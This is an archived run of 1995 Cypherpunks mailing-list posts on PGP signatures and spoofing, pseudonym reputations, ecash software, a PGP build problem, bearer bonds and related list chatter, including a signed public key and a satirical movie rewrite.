.SIG HEILARCHY REVEALED


>Logically, a pseudonym is simply a public key.  However you may want
>to give it a human-readable name so other people may more easily refer 
>to it.  If you decide to do this, I suggest that you do not name the key 
>on its first post because there is a high probability that you will decide 
>to disgard the key.  If you name it and throw it away, then you have
>unnecessarily cluttered up the limited name space.
>
> - a new entity, as yet unnamed

"Cluttering up the namespace" is a growing problem. Fortunately, the InterNIC has taken on the important task of registering pseudonyms, and will coordinate the issuance of new pseudonyms with the Postal Service.

[The issuance of these items is temporarily on hold due to the Government Shutdown (tm).]

The fee for this will likely be quite reasonable, in the $300/year range, consistent with SAIC's plans for other emerging markets.

The InterNIC also sees great promise in collecting fees for .sig blocks, tentatively priced at $10 per line per year. As SAIC Chairman Bobby Ray Inman points out, this is the easiest way to control the proliferation of long .sig blocks.

--Klaus! von Future Prime, a Sanctioned Pseudonym

[.sig removed by order of the InterNIC .Sig Heilarchy until Herr von Future Prime sends us his past due amount]






From raph at c2.org  Sat Nov 18 20:37:53 1995
From: raph at c2.org (Raph Levien)
Date: Sun, 19 Nov 1995 12:37:53 +0800
Subject: Design proposal: crypto-capable generic interface
In-Reply-To: <Pine.3.89.9511181615.A21921-0100000@tesla.cc.uottawa.ca>
Message-ID: <199511190419.UAA15156@infinity.c2.org>


s1113645 at tesla.cc.uottawa.ca wrote:
> MOSS?

MIME Object Security Services. It's a technically superior alternative
to PGP, but one with an uncertain future. It's not being actively
developed by anyone other than TIS, and their TISMOSS prototype
implementation is far from being generally usable.

For more information on the standard, see RFC 1848:
      http://ds.internic.net/rfc/rfc1848.txt

For more information on the TIS effort, see:
      http://www.tis.com/docs/Research/moss.html

Raph





From anonymous-remailer at shell.portal.com  Sat Nov 18 20:52:55 1995
From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com)
Date: Sun, 19 Nov 1995 12:52:55 +0800
Subject: (CANADIAN PRESS REPORTS)
Message-ID: <199511190440.UAA01341@jobe.shell.portal.com>


On Sat, 18 Nov 1995, jim bell wrote:

> >anonymous writes:
> >> I still feel such a sense of violation with what LD did, such an
> >> utter sense of helplessness at the character assassination I've
> >> suffered at his hands, 
> >
> >So use PGP, sign your messages.  Simple solution.
> 
> Absolutely!  Anybody who uses anonymous remailers to post to public areas,
> and does not use digital signatures to prevent spoofing when it is obviously
> needed, is a fool or worse.

Most people believe THAT a digital signature is evidence that I am who my
signature _says_ I am when it really doesn't do that at all.  It isn't
reliable at all. 

Unfortunately, I've learned the hard way NOT to do that.  Digital 
signatures don't prevent spoofing.

In fact, I think that thinking something is secure when it isn't leads 
to even more trouble, and could even lead to many tragedies.

In a nutshell, here's the problem.

If someone takes my pgp secret keyring and my password, then they can 
sign a message *digitally* so that people believe the spoofed message is 
really from me.  In fact, since most people tend to rely on a pgp message 
far more than a non-pgp message, most people would be absolutely 
convinced that the message was in fact from me.

Signing with PGP is just not a solution.



Alice de 'nonymous ...

                                  ...just another one of those...


P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.








From black at eng.usf.edu  Sat Nov 18 21:15:27 1995
From: black at eng.usf.edu (James Black)
Date: Sun, 19 Nov 1995 13:15:27 +0800
Subject: (CANADIAN PRESS REPORTS)
In-Reply-To: <199511190440.UAA01341@jobe.shell.portal.com>
Message-ID: <Pine.SUN.3.91.951118235430.9209A-100000@kinks>


Hello,

On Sat, 18 Nov 1995 anonymous-remailer at shell.portal.com wrote:

> On Sat, 18 Nov 1995, jim bell wrote:
> 
> Most people believe THAT a digital signature is evidence that I am who my
> signature _says_ I am when it really doesn't do that at all.  It isn't
> reliable at all. 
> 
> Unfortunately, I've learned the hard way NOT to do that.  Digital 
> signatures don't prevent spoofing.
> 
> In fact, I think that thinking something is secure when it isn't leads 
> to even more trouble, and could even lead to many tragedies.
> 
> In a nutshell, here's the problem.
> 
> If someone takes my pgp secret keyring and my password, then they can 
> sign a message *digitally* so that people believe the spoofed message is 
> really from me.  In fact, since most people tend to rely on a pgp message 
> far more than a non-pgp message, most people would be absolutely 
> convinced that the message was in fact from me.
> 
> Signing with PGP is just not a solution.

  I am planning on changing pine (a mail program on the Unix) to use PGP 
and RIPEM directly, and this is one of the issues I am dealing with.  The 
fact is that if you let someone get your secret keyring and password then 
that is your problem, as both should be secure, esp your password.
  What I am hoping to do is just have every message that is to be signed 
to be signed with the thumbprint (hash?) of the message, and this will be 
put at the bottom of each message, every time, so that it protects from 
any messages being changed, and verifies who sent the message.
  Again we go back to the fact that the weakest link here is *you* not 
PGP.
  Take care and have fun.  BTW: Once I am done this version of Pine will 
be export controlled it sounds like. :(

James Black
black at suntan.eng.usf.edu





From stewarts at ix.netcom.com  Sat Nov 18 22:19:30 1995
From: stewarts at ix.netcom.com (Bill Stewart)
Date: Sun, 19 Nov 1995 14:19:30 +0800
Subject: negative reputation (was: WRITTEN CODE)
Message-ID: <199511190558.VAA11128@ix6.ix.netcom.com>


At 07:53 PM 11/18/95 -0500, a new entity, as yet unnamed wrote:
>Logically, a pseudonym is simply a public key.  However you may want
>to give it a human-readable name so other people may more easily refer 
>to it.  If you decide to do this, I suggest that you do not name the key 
>on its first post because there is a high probability that you will decide 
>to disgard the key.  If you name it and throw it away, then you have
>unnecessarily cluttered up the limited name space.
>
> - a new entity, as yet unnamed

Here's the new entity's key, signed :-)  I haven't added it to the
PGP key servers; I'll leave that up to you...

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.7.1
Comment: PGP available outside U.S.A. at ftp.ox.ac.uk

mQCNAzCuftgAAAEEAL35udZ/l0s590SjtzSM9eAepxAGe9Mp38ZoTsvfmNQh008W
sLtiYKmSYKBPuuRZIpYBZEjLZry5p6xHUpsKuflNXy7sdeHBviU+x8J57ip4DLx2
+tlv4dtjLKxzVGEqEfWOb3oRHCJ1t2IgV5A9RBzp2SXke56pTo2Fr67QcvwZAAUT
tBxhIG5ldyBlbnRpdHksIGFzIHlldCB1bm5hbWVkiQCVAwUQMK61KfnzJsm1fsvF
AQGJeAP/c0DO4e1y4SIpLAF9vJwqr6ewFHWopHJRprWUUyBhH+TRehOQLPgocwR/
7lOILgfizrLshu5W5fOyY+pjBVj6LssF8dILMe81I5LjlDT58NVtkfPDdkHNxFpf
fgEmJlKYYfsCrXDlwn0RAFwzLC1x+1okAoixhvLWx7ygr1rpyKA=
=PED/
-----END PGP PUBLIC KEY BLOCK-----
#--
#				Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com
# Phone +1-510-247-0663 Pager/Voicemail 1-408-787-1281







From anonymous-remailer at shell.portal.com  Sat Nov 18 22:22:37 1995
From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com)
Date: Sun, 19 Nov 1995 14:22:37 +0800
Subject: CANADIAN PRESS REPORTS (was Re: CSE gets flak on TV)
Message-ID: <199511190612.WAA15057@jobe.shell.portal.com>


Alice here (the real one) ...

On Sat, 18 Nov 1995, Perry E. Metzger wrote:

> I hope everyone realizes that Detweiler is probably arguing with
> himself, three levels deep. I must admit that the levels he stoops to
> in order to draw attention to himself are pathetic. Why don't you just
> stick to posting as Vlad Nurzi? Its more dignified.

Deitweiler certainly is getting around ... but I'm beginning to have
my doubts whether it is Deitweiler who is spoofing me.  

And Deitweiler might be Vlad Nurzi or whoever, but it seems that
whoever is spoofing me -- whether it is Detweiler or not -- is privy
to certain "facts" ... verifiable facts ... some of which are very
worrisome.

And its not just whatever news is breaking over the wire.

anonymous-remailer at shell.portal.com writes:
> > 
> > Here is the TRUE unedited story for the list which Deitweiler felt he
> > had to TWIST to the nth degree.  His attempt at making mountains out
> > of mole hills will not succeed with this one.
> 
> This story truly is a non-starter.  Big deal.  It really has no
> relevance to this international list.  This is simply a Canadian matter.

I take this last comment back.  It was premature.  I think that this
is in fact very relevant to this list.  And it's not just a Canadian
matter.

My little spoofing-shadow, Mr. Mystery-Writer, seems to not only have
a juvenile sense of humour, but seems to have a handle on some pretty
sensitive information.  

His information isn't limited to how Canada was able to outbid the 
United States on a wheat deal with China, but his information 
encompassess matters of an order of greater significance, especially
when Mr. Mystery-Writer wrote: 

> And that's the fleshed out version of the story.
>
> I'm just sorry that our Prime Minister is in such a bad position because 
> of the timing of this "Jane Shorten's" revelations.  She also revealed 
> that Canada spied on Japan.
> 
> To think ... Canadian Prime Minister Chretien is a guest of the Japanese
> people today.  Talk about some awkward moments.  I mean, what on earth do
> you talk about?? 
> 
> George Bush and Sushi??

Whoever it was who wrote this, they took a real swipe at a former
President of the United States.  This is very, very serious.  Joking
about Japanese / American relations is very black humour and is one
thing, but taking an open swipe at a former American President is
grossly inappropriate and was completely another, I thought.

But, ironically, Mr. Mystery-Writer had incredible foreshadowing
skills.

> Let's see ... over the last couple of days, we've had one provincial
> Premier resign over "BingoGate" -- kickbacks from bingo games, another
> premier is under some pretty heavy fire for some insider trading in a
> company he promoted in Hong Kong, (actually his wife got stock she never
> had to pay for), while Canada in conjunction with the normally very
> neutral Swiss have frozen accounts pertaining to about $20 million or so
> in kickbacks from Airbus Industries to a "senior Canadian politician".
>
> And all these stories ... coincidentally ... broke back to back.

This to me was the kicker ... especially in light of news which just
broke tonight.  Mr. Mystery-Writer was trying to throw a clue.
And boy, what a clue it was.

It wasn't the former President of the United States that he was
speaking of ... it was the former Prime Minister of Canada.

It was reported today that former Canadian Prime Minister Brian
Mulroney has launched a $50 Million pre-emptive lawsuit against the
Royal Canadian Mounted Police and the Canadian Department of Justice
for their possible future allegation or possible future charge of
taking kickbacks from Airbus Industries while the former Prime
Minister held public office.

This is one heck of a newsflash ... especially considering the
co-operation of the normally secretive and discreet authorities in
Switzerland.

Can you imagine if former President George Bush had in fact launched a
$50 Million pre-emptive lawsuit against the Federal Bureau of
Investigation and the Department of Justice, because they were
investigating him for something??  

Or if George Bush tried to stop a news story through libel chill?

My shadow was right (even if he did announce before the wires, did),
Canadian politicians are beginning to drop like flies.  

Let the "Jane Shorten" Film-Fest begin.  Can you pass the popcorn?



Alice de 'nonymous ...

                                  ...just another one of those...


P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.






From Cybie at cris.com  Sat Nov 18 22:50:09 1995
From: Cybie at cris.com (Greg Morgan)
Date: Sun, 19 Nov 1995 14:50:09 +0800
Subject: VB4 secure mail software
Message-ID: <199511190630.BAA13412@deathstar.cris.com>


To the guy who was interested in writing a secure mail program that
worked with MS Exchange in VB4, e-mail me...  I was also thinking of
working on something like that, we could probably work together on
this.







From jimbell at pacifier.com  Sat Nov 18 22:55:42 1995
From: jimbell at pacifier.com (jim bell)
Date: Sun, 19 Nov 1995 14:55:42 +0800
Subject: (CANADIAN PRESS REPORTS)
Message-ID: <m0tH33n-00091vC@pacifier.com>


Detweiler wrote...

>On Sat, 18 Nov 1995, jim bell wrote:
>
>> >anonymous writes:
>> >> I still feel such a sense of violation with what LD did, such an
>> >> utter sense of helplessness at the character assassination I've
>> >> suffered at his hands, 
>> >
>> >So use PGP, sign your messages.  Simple solution.
>> 
>> Absolutely!  Anybody who uses anonymous remailers to post to public areas,
>> and does not use digital signatures to prevent spoofing when it is obviously
>> needed, is a fool or worse.
>
>Most people believe THAT a digital signature is evidence that I am who my
>signature _says_ I am when it really doesn't do that at all.  It isn't
>reliable at all. 
>
>Unfortunately, I've learned the hard way NOT to do that.  Digital 
>signatures don't prevent spoofing.
>
>In fact, I think that thinking something is secure when it isn't leads 
>to even more trouble, and could even lead to many tragedies.
>
>In a nutshell, here's the problem.
>

WARNING!  WARNING!  WARNING!  BIG "IF" COMING UP!  BIG "IF" COMING UP!!!


>If someone takes my pgp secret keyring and my password, then they can 
 ^^

>sign a message *digitally* so that people believe the spoofed message is 
>really from me.  In fact, since most people tend to rely on a pgp message 
>far more than a non-pgp message, most people would be absolutely 
>convinced that the message was in fact from me.

Pardon me, but what was the point of that last comment?  It is an obvious
statement of fact that yes, IF IF IF somebody had a secret key AND password,
he could duplicate a signature.  

Digital signatures allow a person to exclude others from being able to sign
messages as if they are from him.  True, a person could simply publish his
secret key and password, at which point everyone could sign notes as if they
came from him, but that wouldn't be "interesting" because most people would
have no reason to do so.

>Signing with PGP is just not a solution.

It is, apparently, in the vast majority of possible situations.  Why would
you even try to disagree?

Oh, yes, I forgot... you're Detweiler.


 






From don at wero.byu.edu  Sun Nov 19 01:23:13 1995
From: don at wero.byu.edu (Don M. Kitchen)
Date: Sun, 19 Nov 1995 17:23:13 +0800
Subject: [NOISE] REWRITE! : GoldenEye
In-Reply-To: <199511180406.XAA18908@bb.hks.net>
Message-ID: <ML-2.0.816771664.7349.don@wero.byu.edu>


> Just got back from the new Pierce-Brosnan-as-007 flick.
> It had a few typical "hacker" stereotypes, and a couple
> of interesting crypto relevant references.

Here's the cypherpunk rewrite of the movie... 

> * Boris, the stereotypical hacker, was hacking through American
> banks.  A screen had the words "Department of Justice" and the
> DoJ logo; underneath were the words "Clipper Chip" and a list
> of banks.

...bought the clipper codes from some guy at the DOJ for $100.
(gets a discount rate - normal rate is $200)

> * The archvillian's plan involved a massive money transfer and
> an EMP pulse; he very briefly explained the effects of what
> would happen if every computer in London were rendered non-
> functional.  Possible crypto-anarchy bits.

No need.

All the banks are using DES, which has suddenly become strong again.
(only for another 10 years, of course)

> * Boris should learn the value of strong passphrases.  His
> password for the massive mainframe which will be used in the
> archvillain's scheme is a five-letter dictionary word, which
> didn't change (and it was used on two different computers),
> and he revealed it indirectly (it was a word puzzle).

..hacked the account from some guy in Microsloth network security,
who doesn't know yet that anyone else is using it.

> * A few on-computer-screen references to "encryption".
> 
> * Boris and the mastermind kept bantering about "breaking codes."

It really is annoying to try to break 40bit keys realtime. Why couldn't
they have been only 32 bits or something...

> * Boris' computer in Russia - in his apartment - has a domain
> ending in ".comp.math.edu"; when his screen lights up with
> the words "INCOMING EMAIL" he goes into a live chat (complete
> with graphics).

Using Weidei's TCP tunneler to submarine his computer so that it
_REALLY_IS_ under that domain. (After all, someone would probably
suspect kgb.com or UofHack.edu.ussr domains)

Re chat with graphics: isn't X great?! Have to remember to hack
into a T3 though, this lag is really slowing the feed down... Makes
the movie longer, ya know. Plus, techies will get a thrill if movie
shows doom being played remotely.

There you have it. Suitable for any cryptoanarchists' night out.

Don


PS: Anyone know about ML, the IMAP mail program? Just installed the
new version at home and noticed I haven't seen the PGP hooks in the
configuration like I did on earlier versions. Hmmmmmmmmmmmmmmmmmmm





From anonymous-remailer at shell.portal.com  Sun Nov 19 02:31:58 1995
From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com)
Date: Sun, 19 Nov 1995 18:31:58 +0800
Subject: reputations: discussions and meta-discussions
Message-ID: <199511191017.CAA27805@jobe.shell.portal.com>


-----BEGIN PGP SIGNED MESSAGE-----

On Sat, 18 Nov 1995, Bill Stewart wrote:
 
> Here's the new entity's key, signed :-)  I haven't added it to the
> PGP key servers; I'll leave that up to you...

As we know, a public key certificate is a binding between the key and
some attribute, as asserted by the signer.  In this case you have asserted
a binding between my key and the string "a new entity, as yet unnamed".
I don't understand why you did this.  Would you please explain?

The only reason I can think of is that you wanted to provide evidence
for the key's creation date by timestamping it.  If that was the case,
I thank you.  But in the future, to avoid confusion, perhaps you can 
create a new ID "timestamp" for the key and sign that instead.

 -------------

On a different subject, given the likelihood of an increasing number 
of new identities showing up on this list, I propose that we create 
a new mailing list (cypherpunks-reputations) devoted to
the discussion of reputations of cypherpunks participants.  A significant
number of posts on cypherpunks are already discussions of this sort.  I
believe it would be benificial to create a seperate channel for these
meta-discussions so they do not interfere with regular cypherpunk topics.

By encouraging discussions about reputations of specific entities, we
may also gain some insight on the general properties of reputation systems.
In this sense by creating this new list we create an interesting
self-referential loop -- cypherpunks-reputations contains meta-discussions
about cypherpunks, which in turn contains meta-discussions about 
cypherpunks-reputations.

Examples of posts appropriate for this new mailing list would include:
* knowledge, intelligence, style and quirks of cypherpunks participants
* exchange of keys and certificates
* speculation on connections between entities
* kill file entry recommendations

I do not have the physical resources to serve such a mailing list, so
I hope someone who does will volunteer.

 - keyid D072FC19 (still unnamed)

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMK8CnY2Fr67QcvwZAQGUJgP9G8ER/qH8OKvSbOtPYwaDQMkVyKFWafxH
Ukbm0lKgCwS97cEKufxJH49VCRkxrd+t+ia5IRNDxewB1xlcjAKRvp4MK8Ps6MTy
FbhmEpfhB4pnfE5l+e8VnZSoD79j0Sv6C80C48NL6NJNV6PhhTS9B5lXxW/qJv9D
3ZTpTf5AjZI=
=e4DU
-----END PGP SIGNATURE-----





From sameer at c2.org  Sun Nov 19 03:33:24 1995
From: sameer at c2.org (sameer)
Date: Sun, 19 Nov 1995 19:33:24 +0800
Subject: ecash as pgp
Message-ID: <199511191118.DAA14424@infinity.c2.org>


	This is really frustrating.

	I'm trying to figure out how to use this damn ecash software
to setup a prototype ecash-accepting remailer.

	For one thing, there's no documention.

	Secondly, from what I can tell, it's like PGP. To integrate it
into other software you have to do all sorts of nasty output
parsing. why the hell can't it just produce nice, terse, informative,
UNIX-like output?

	it's late, i'm tired, I'm going to sleep.

	(the party was fun, btw, thanks to everyone who showed up.)

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org/ (or login as "guest")		sameer at c2.org





From bdolan at use.usit.net  Sun Nov 19 05:54:46 1995
From: bdolan at use.usit.net (Brad Dolan)
Date: Sun, 19 Nov 1995 21:54:46 +0800
Subject: Real-life example of why National ID cards won't work
Message-ID: <Pine.SOL.3.91.951119083458.15541B@use.usit.net>




---------- Forwarded message ----------
#Date: Fri, 17 Nov 95 16:18:55 PST
#From: medic at netvision.net.il
#To: shomronnews at felix.dircon.co.uk
#Subject: Update 755

SNS News Service  "Interior Ministry Scandal"
November 19, 1995..26 Cheshvan  5756..Number 755..Update from 
Israel ...

Following a report released by Yediot Achronot Newspaper, Interior 
Minister (Labor) Ehud Barak has ordered an immediate investigation 
into allegations of wrong-doing by senior Ministry officials.

The report states that falsified ID cards and other Ministry permits 
are being sold to Arabs. Among those mentioned in the newspaper 
story is Chaim Ben-Atar, the Director of the Ministry's East 
Jerusalem Office, a Member of Knesset, and past members of the 
Mossad and GSS (Shin Bet). 

The Yediot report also alleges that Police officials silenced 
investigations over the past two years (that may have prevented 
terrorist attacks) for the fear of revealing names of top officials 
involved in the Ministry false documentation scam. The 
investigations involved senior officers in the IDF Civil Administration, 
 IDF officers, senior Ministry of the Interior officials and officials in 
the Jerusalem Municipality.  

Some of the allegations:
1) In the East Jerusalem Branch of the Ministry of the Interior, 
Arabs that are not entitled by law may still receive ID cards, travel 
permits to Jordan, and other official documentation in return for 
cash payments or "favors". 

2) Senior officials in the security service of the State have abused 
their connections with the east and west Jerusalem Ministry Offices, 
and have offered permits to travel abroad in return for cash 
payments. The permits were given to Arabs that would not be able 
to obtain them legally. 

3) Interior Ministry workers have received favors and cash payments 
from Arab and Jewish agents in return for issuing travel documents, 
ID cards and passports.

4) Chaim Ben-Atar, the Director of the East Jerusalem Interior 
Ministry Registration Office has provided five Arab residents of 
Gaza with ID cards stating they live in East Jerusalem. 

5)  Ben-Atar also employed an Arab woman during a four-year 
period whose brother is a "religious fanatic activist in East 
Jerusalem". The Arab woman who assisted Ben-Atar has access to 
highly classified information.  She was released from her position 
one year ago for "personal reasons."

6) During an investigation into wrong-doing by the past head of the 
Allenby Bridge crossing, information pointing to wrong-doing by 
other senior IDF officers and Jerusalem Municipality workers was 
uncovered as well. The Ministry chose not to pursue the 
investigation against them.  The cases against them were silenced 
by Interior Ministry officials.  (Yediot Achronot ..11/19..Page 5).

...








From jamesd at echeque.com  Sun Nov 19 07:17:59 1995
From: jamesd at echeque.com (James A. Donald)
Date: Sun, 19 Nov 1995 23:17:59 +0800
Subject: Recompiling PGP 2.6.2i under microsoft.
Message-ID: <199511191508.HAA19053@blob.best.net>


I am trying to recompile  PGP 2.6.2i under Microsofts VC 1.5.

Unfortunately the makefile pgp.mak is configured for borlands C
compiler and linker, and the makefile pgppwb.mak gives me a bunch of
link time errors.

Is there someone around who has been there and done that.

Is this just a trivial edit or a serious rewrite?

C:\PGP\PGP.SRC\SRC> nmake -f pgppwb.mak

[....]

Libraries [.lib]:
Definitions File [nul.def]:  /NOI /STACK:12288 /BATCH /ONERROR:NOEXE
/EXE /FAR /
PACKC;

RSAGEN.obj(rsagen.c) : error L2029: '_rsa_public_decrypt' : unresolved
external
CRYPTO.obj(crypto.c) : error L2029: '_rsa_public_decrypt' : unresolved
external
RANDOM.obj(random.c) : error L2029: '_randPoolGetByte' : unresolved
external
RANDOM.obj(random.c) : error L2029: '_randPoolStir' : unresolved
external
CRYPTO.obj(crypto.c) : error L2029: '_rsa_public_encrypt' : unresolved
external
IDEA.obj(idea.c) : error L2029: '_randPoolGetBytes' : unresolved
external
RANDOM.obj(random.c) : error L2029: '_randPoolAddBytes' : unresolved
external
RSAGEN.obj(rsagen.c) : error L2029: '_rsa_private_encrypt' :
unresolved external

CRYPTO.obj(crypto.c) : error L2029: '_rsa_private_encrypt' :
unresolved external

RANDOM.obj(random.c) : error L2029: '_sleep' : unresolved external
RANDOM.obj(random.c) : error L2029: '_noise' : unresolved external
PGP.obj(pgp.c) : error L2029: '_noise' : unresolved external
CRYPTO.obj(crypto.c) : error L2029: '_rsa_private_decrypt' :
unresolved external


NMAKE : fatal error U1077: 'LINK' : return code '0x2'
Stop.


 ---------------------------------------------------------------------
We have the right to defend ourselves and our property, because 
of the kind of animals that we are. True law derives from this 
right, not from the arbitrary power of the omnipotent state.

http://www.jim.com/jamesd/      James A. Donald       jamesd at echeque.com






From BELL at odo.law.udayton.edu  Sun Nov 19 08:57:00 1995
From: BELL at odo.law.udayton.edu (Tom Bell)
Date: Mon, 20 Nov 1995 00:57:00 +0800
Subject: Anonymity and Intellectual Capital
Message-ID: <BDA7F31725@odo.law.udayton.edu>


> I've ranted about all this here and elsewhere, how falling semiconductor
> prices, public networks and strong cryptography beget the reemergence of
> bearer certificates, this time in digital form (of which ecash is only the
> prima facie example, the existence proof) and what I call, for lack of a
> better term, a "geodesic", instead of hierarchical, economy.

> Bob Hettinga

Agreed.  What's more, I'll make a similar claim about the legal 
system -- with the rise of alternate dispute resolution systems, it 
too appears to be moving toward a system where law issues less from 
state authorities and more from private ones.  Post's article brings 
out this point well.

As for terminology, I prefer "polycentric."  Originally coined (I 
believe) by Polyani with regard to non-hierarchical societies, it 
works quite well in economic and legal contexts.  A polycentric 
system harbors overlapping authorities in free and open competition.

Tom W. Bell
Assistant Professor 
Law and Technology Program
UD Law School
bell at odo.law.udayton.edu

PGP fingerprint:
78 06 76 AC 32 38 A6 4C  B3 81 F4 1E 2E 27 AC 71






From jenkins at fox.nstn.ca  Sun Nov 19 09:50:21 1995
From: jenkins at fox.nstn.ca (GORD JENKINS)
Date: Mon, 20 Nov 1995 01:50:21 +0800
Subject: JIBC Annoucement
Message-ID: <58085.jenkins@fox.nstn.ca>



----- Forwarded message begins here -----
From: junhan zhang  <jzhang at ARRAYdev.com>
Thu, 9 Nov 1995 12:11:10 -0500 (EST)
To: gord at array1.arraydev.com
Subject: JIBC Annoucement

________________________________________________________________________

Journal of Internet Banking and Commerce

The goal of this publication is to inform executives, professionals,
entrepreneurs, government employees and other key players on principal
developments and trends in the rapidly evolving electronic commerce area all
over the World.  This free online Journal is a way to keep in touch, to
share information, and to establish business contacts (networking) in the
area of electronic commerce and banking on the Internet.

Journal of Internet Banking and Commerce (JIBC) is primarily devoted to
important announcements, original articles, guest columns, significant
feature presentations from other publications, as well as survey, reviews,
and letters to the editor.  Technical discussions that belong to several
other specialized lists will be kept to the absolute minimum.

Our Journal will be issued no more often than two or three times a week,
limiting material to the absolute minimum.  We are definitely looking for
quality, not quantity.  Needless to say, we will be editing filtering and,
where possible, summarizing, to provide our busy readers only with
substantial information. 

Join this site and learn the trends in electronic commerce.  We promise not
to get too" techie". Not too many fights but lots of good discussion.  We
will need your articles , your letters, your contributions and 
discussion.  

The Journal is maintained and published courtesy of ARRAY Developments of
Ottawa, Canada (http//www.ARRAYdev.com/).  The Publisher, Nahum Goldmann may
be reached at:
  Nahum.Goldmann at ARRAYdev.com.  
Or you can reach the editor and moderator, Gord Jenkins of JENKINS AND
ASSOCIATES INC with any questions, comments or insights at:
  Jenkins at fox.nstn.ca (http//www.infop.com/karoma), Tel. 613-723-1581, 
  FAX 613-723-8938.

Please note that the mailing address for subscribe/unsubscribe is 
 JIBC-request at ARRAYdev.com 
 ************ 
 
World Wide Web information about this mailing list is available via: 
  http://www.arraydev.com/commerce/JIBC/.  
Please send any questions on its maintenance to the list owner :
  <JIBC-admin at ARRAYdev.com>.
Note that ARRAY Development is neither responsible nor necessarily shares
opinions expressed on the list. 
     
This message is sent monthly to the JBCI list.   If mail sent to you cannot
be delivered successfully, your email address will be ruthlessly removed
from the mailing list to prevent bounces for senders.  If you believe you
have been dropped, you can check your subscription status by sending mail 
to: 
    majordomo at ARRAYdev.com 
  Write in the body of message (NOT Subject:) 
 JIBC Your_email_address
 
This command will confirm whether you are on the current list of 
subscribers. 
 
    To subscribe: 
        Send email to JIBC-request at ARRAYdev.com 
        Body of message (NOT Subject:)  subscribe 
    To unsubscribe: 
        Send mail to JIBC-request at ARRAYdev.com 
        Body of message (NOT Subject:)  unsubscribe 
    To contribute to the mailing list: 
        Send mail to JIBC at ARRAYdev.com 
     
  Notice the difference between the two email addresses for subscribing  
(JIBC-request) and posting (JIBC)! 
 
    Send other inquiries to owner JIBC-admin at ARRAYdev.com 
 
    To get a description of all valid commands: 
        Send mail to majordomo at ARRAYdev.com 
        Body of message (NOT Subject:) help 
 
    As our Journal is a moderated list, there is no "digest" facility. 
 ________________________________________________________________________
------ Forwarded message ends here ------
 --
 GORD JENKINS
e maik  JENKINS at fox.nstn.ca
tel 613 794 6735
fax 613 723 8938





From dlv at bwalk.dm.com  Sun Nov 19 10:59:32 1995
From: dlv at bwalk.dm.com (Dr. Dimitri Vulis)
Date: Mon, 20 Nov 1995 02:59:32 +0800
Subject: Anonymity and Intellectual Capital
In-Reply-To: <Pine.3.89.9511182108.B25524-0100000@tesla.cc.uottawa.ca>
Message-ID: <BXqTeD51w165w@bwalk.dm.com>


s1113645 at tesla.cc.uottawa.ca writes:
> Barring escrow services, I don't see how contracts (or a lot of
> other laws) could be enforced against these entities when they can simply pop
> in and out of existence (unless they have some physical counterpart, like
> a storefront and merchandise. But then these are easily linkable to True
> Names, unlike software companies, financial services or any other part of
> the info economy.)
>
> The value of a reputation is not particularly high in lots of cases or is
> occasionally worth throwing over for a big one-time scam. (Pyramid scams
> for "reputable" banks)

I think this setup would be totally appropriate for the kinds of services or
merchandize where the buyer may determine at the time of payment whether the
product is what it's billed to be; and needs no warranty or service. In other
words, forger any implied warranty of merchantability and go back to Roman
Law's "caveat emptor".

E.g., if you buy an office chair with a 90-day money back guarantee, you have
90 days to discover defects and return it; you want to be able to get hold of
the seller if you have to. On the other hand, if you buy some shares of IBM,
once you're satisfied that these really are IBM shares and the other party can
sell them, I don't think you need to know anything more about the seller. In
fact, in the real stock market most investors go through 2 brokers and usually
have no idea who you're buying these shares from.

> Ps. I know I could probably look this up, but exactly what are bearer bonds?
> I frequently hear them mentioned when market anonymity and money laundering
> come up.

I haven't seen anyone respond, so I'll ramble on.

A bond is general is an instrument that you buy from an organization that's
trying to raise capital (e.g., a company or a municipality). For example, you
might buy for $600 a bond issued by some, who promises to pay you $50 twice a
year for the next 20 years, and then pay you another $1000 in 20 years (at
maturity). Thus, the organization that issues the bond is borrowing money from
the investor and then pays interest on it. There are slight variations, like
zero-coupon bonds, which don't make a periodic payments, but pay the lump sum
at maturity. I heard that in Europe they have perpetual bonds, which never
mature. (When you buy bonds, you take certain risks: the issuer may default and
not make the promised payments; the interest rates may go up, so you would have
gotten better return in a CD; etc; but that's besides the point.)

Obviously, there's an aftermarket in bonds. An investor may want a $700 now,
rather than $1000 in 20 years, so s/he sells the bond to another investor
(generally, the less time is left to maturity, the smaller the discount from
the par value). How does the organization that issued the bonds know who is
supposed to receive the periodic coupon payments?

In the past, many bonds were "bearer instruments". The owner of the bond had in
his or her physical posession a piece of paper entitling him to the periodic
payments, and transferred the piece of paper to the new owner when the bond was
sold. To collect the payments due the owner, someone had to present the piece
of paper to the bond issuer's agent. The agent would remove a physical coupon
from the piece of paper and give the bearer some money.

(Think of a movie ticket -- its bearer is admitted to see a movie and doesn't
have to identify himself beyond presenting the ticker.)

The problem with this system, from the point of view of the Internal Revenue
Service and other U.S.Gov't agencies, was that the bearer could be anonymous
and did not have to identify his/herself beyond presenting the piece of paper
entitling him/her to the payment. This, they could in principle not declare
these payments on their income tax return and the IRS would have a tough time
tracking them down.

So, about 20 or so years ago, the U.S.Congress required bond issuers to tell
the IRS who received their bond payments. No more anonymity, no more bearer
bonds. (My papers are in the office, so this could in fact be more draconian --
U.S. people prohibited from owning bearer bonds issued by European companies.)

In comparison, if you own stock in a company, your stock certificate is never a
bearer instrument. The corporation knows its shareholders of record, sends them
their dividends, and tells the IRS whom it sent the dividends. When you have an
interest-bearing account at a bank, a SS# is associated with it (or else you
pay penalties) and the IRS is informed about any interest you've earned.

The fact that bearer bonds were outlawed suggests that if and when new ways are
invented to conduct financial transactions that are conductive to tax evasion
(e.g., using anonymous electronic payments), they too may become outlawed.

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps





From rah at shipwright.com  Sun Nov 19 12:58:45 1995
From: rah at shipwright.com (Robert Hettinga)
Date: Mon, 20 Nov 1995 04:58:45 +0800
Subject: e$: What's a digital bearer bond?
